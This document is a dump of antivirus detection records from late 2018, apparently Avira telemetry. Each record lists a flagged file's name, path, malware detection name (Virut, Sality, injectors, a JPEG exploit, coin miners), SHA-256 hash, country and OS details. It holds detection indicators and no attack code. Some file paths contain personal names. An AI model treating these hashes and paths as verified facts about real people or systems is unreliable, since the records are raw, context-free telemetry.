  Row(detection=Row(filename='tprecpfs5_01075.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Testing Program 2016 Cloud\\Visor\\Flash\\TPRECPFS5_01075.exe', filesize=428000, name='HEUR/APC.#M1.#R1'), hash='754a7c6dc603e91ddf492df8c5c117e2c29f8eb575795634b8113311ef5d491c', metadata=Row(cmdline=None, country='SV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:27:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054333-34fda22a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054333-34FDA22A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054110-dfa1c58b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054110-DFA1C58B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='7d3b3b7dd8a1433488fe97914613de0b3f0141c1c9d716c7c0f3b6ddcba70f01', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T02:11:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053311-c1b2119e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053311-C1B2119E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054421-519790eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054421-519790EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:16:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053731-5d3d3c85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053731-5D3D3C85', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T18:57:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060712-82bad740', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060712-82BAD740', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T03:15:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ospprearm.exe', filepath='C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPREARM.EXE', filesize=92000, name='W32/Sality.AT.#M1.#R1'), hash='7f40325edd81e6112f9f9ea2b923c3d9ad33ddb24a9c14b436b81b01e70f63c2', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T00:59:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053708-4f2c61c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053708-4F2C61C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052100-0df7d464', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052100-0DF7D464', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kawai2003.exe', filepath='\\\\?\\D:\\Phim cua Minh Bach\\Games\\Kawai2003\\Kawai2003.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='1f2e80e7e2433fa6c9baa5d8cbbcd3aeb6783d5ef3cf2a020cb303cc3608dedb', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:35:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a33a8bb73942529478ab22067aabc685f1cd8fc4', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\a33a8bb73942529478ab22067aabc685f1cd8fc4', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='53964810fdd4b45aa96ed43ddd1d69ec6c93837a34ba6e21520d36a67bad86c6', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:50:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155836-dc23ec39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155836-DC23EC39', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T19:39:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-211101-3ee3bfc7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-211101-3EE3BFC7', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:10:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwha349', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHA349', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:43:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1540585994132808932', filepath='C:\\Program Files (x86)\\DesktopCentral_DistributionServer\\DownloadRepository\\1540585994132808932', filesize=6288000, name='HEUR/AGEN.1003960.#M1.#R1'), hash='08bcb2fdd0ac8222ff6eed6ced1673327d6abe8a78134e27e1b13709f41b097c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T06:02:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154838-775a1a8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154838-775A1A8C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='live band.exe', filepath='D:\\LIVE BAND.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:26:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154929-7fe0e207', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154929-7FE0E207', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sosialisasi.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\DOKUMENTASI\\FOTO SOSIALISASI\\SOSIALISASI.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh6c4d', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH6C4D', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:41:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3903784, timestamp='2018-11-01T08:25:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T17:53:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-01T16:08:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='klist.exe', filepath='C:\\Program Files\\Java\\jre6\\bin\\klist.exe', filesize=116000, name='W32/Sality.AW.#M1.#R1'), hash='048a2eda453b329d6c9cf84b3e3f0c79732bf8ab23e1f2168b4d279cebf9095f', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T02:56:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='deldrv.exe', filepath='E:\\Daiver Printer\\Canon MX328\\win\\Driver\\x86\\DrvSetup\\DelDrv.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='260b013f56ba4a552733789e20fd593da270bfac8b59df2d9617e55d6aed8965', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T11:17:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='joanice aparecida anjos da silva .scr', filepath='C:\\Users\\X\\Desktop\\Joanice Aparecida Anjos da Silva .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:15:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152058-1c2ecdff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151312-DB3E0F68\\AVSCAN-20181101-152058-1C2ECDFF', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='230881192938357.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\230881192938357.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:32:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tarzan.exe', filepath='E:\\طرازان\\TARZAN.EXE', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='4b955289aebc0e2afccd5dbb6a8377dd2743d18fd9da35e27fa3cbabf73076f0', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:WsoFSn65fkG2WP1I.1', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122560, timestamp='2018-11-01T13:28:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T17:32:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-192425-b97f4580', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_805ce542\\AVSCAN-20181101-192407-B7903B2C\\AVSCAN-20181101-192425-B97F4580', filesize=768000, name='TR/Dldr.Zampol.739b8a.#M1.#R1'), hash='739b8a4666a5a3d17bdff8bae937510ff74c1da4c58a98670b8e30e4e7deb8fd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='94b00e30c8968aabd833cc71544a955f1d5cbfc2d1a4fdcdc38e06fbd3d94fa5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\94B00E30C8968AABD833CC71544A955F1D5CBFC2D1A4FDCDC38E06FBD3D94FA5', filesize=176000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='94b00e30c8968aabd833cc71544a955f1d5cbfc2d1a4fdcdc38e06fbd3d94fa5', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:31:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nmworker.vir', filepath='C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.VIR', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T15:36:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110745-e23cc228', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110745-E23CC228', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:07:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='00005710.html', filepath='C:\\ProgramData\\Adobe\\Flash CS3\\en\\Configuration\\HelpPanel\\Help\\FlashLiteLearningAS1\\00005710.html', filesize=120000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='d0c44d1ffce8faeb560515be65b92aaa63d943f704f7eeff89c61ef63f67e33f', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-01T12:44:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110602-d549478f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110602-D549478F', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a73f59e56d00e0da6a276e84be35ebd7918c3716b43c69a382ae23ccd8343ae5.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-13.available\\Avira\\A73F59E56D00E0DA6A276E84BE35EBD7918C3716B43C69A382AE23CCD8343AE5.VIR', filesize=1500000, name='TR/Bancos.HA.1.#M1.#R1'), hash='a73f59e56d00e0da6a276e84be35ebd7918c3716b43c69a382ae23ccd8343ae5', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:57:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000a638', filepath='C:\\WINDOWS\\Temp\\133adec8-cf3f-4d03-a039-763dba312fa0\\tmp0000036d\\tmp0000a638', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='8460c459ddd42fe462f0da14f356f3ce609a5dfdcef29944cc0f39ff2a917462', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T16:14:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='a18810735b41182af758dd1d4152ddfaaafd8ba7adeda7d478405e33050b3d17', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T22:00:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111417-d0272f83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea1254c4\\AVSCAN-20181101-111225-BAAB26DF\\AVSCAN-20181101-111417-D0272F83', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:14:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hpqdirec.exe', filepath='C:\\Program Files (x86)\\HP\\Digital Imaging\\bin\\Hpqdirec.exe', filesize=960000, name='W32/Sality.AT.#M1.#R1'), hash='ea3ab3441f0f6b330a73b8cd052afd7641997ad5904987dfb52b074cd3975623', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T17:33:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142902-240cf4c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142902-240CF4C8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:00Z'), dt=datetime.date(2018, 11, 1)),
